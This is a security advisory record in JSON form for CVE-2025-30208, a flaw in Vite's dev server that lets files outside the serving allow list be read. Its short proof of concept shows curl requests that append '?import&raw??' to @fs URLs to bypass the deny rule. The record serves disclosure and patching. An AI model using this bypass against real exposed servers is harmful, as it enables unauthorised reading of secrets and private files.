{ "schema_version": "1.4.0", "id": "GHSA-x574-m823-4x7w", "modified": "2025-03-25T14:00:02Z", "published": "2025-03-25T14:00:02Z", "aliases": [ "CVE-2025-30208" ], "summary": "Vite bypasses server.fs.deny when using ?raw??", "details": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n \n

403 Restricted

\n

The request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.2.0" }, { "fixed": "6.2.3" } ] } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.1.0" }, { "fixed": "6.1.2" } ] } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.12" } ] } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.4.15" } ] } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.5.10" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30208" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1" }, { "type": "PACKAGE", "url": "https://github.com/vitejs/vite" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-284" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-03-25T14:00:02Z", "nvd_published_at": "2025-03-24T17:15:21Z" } }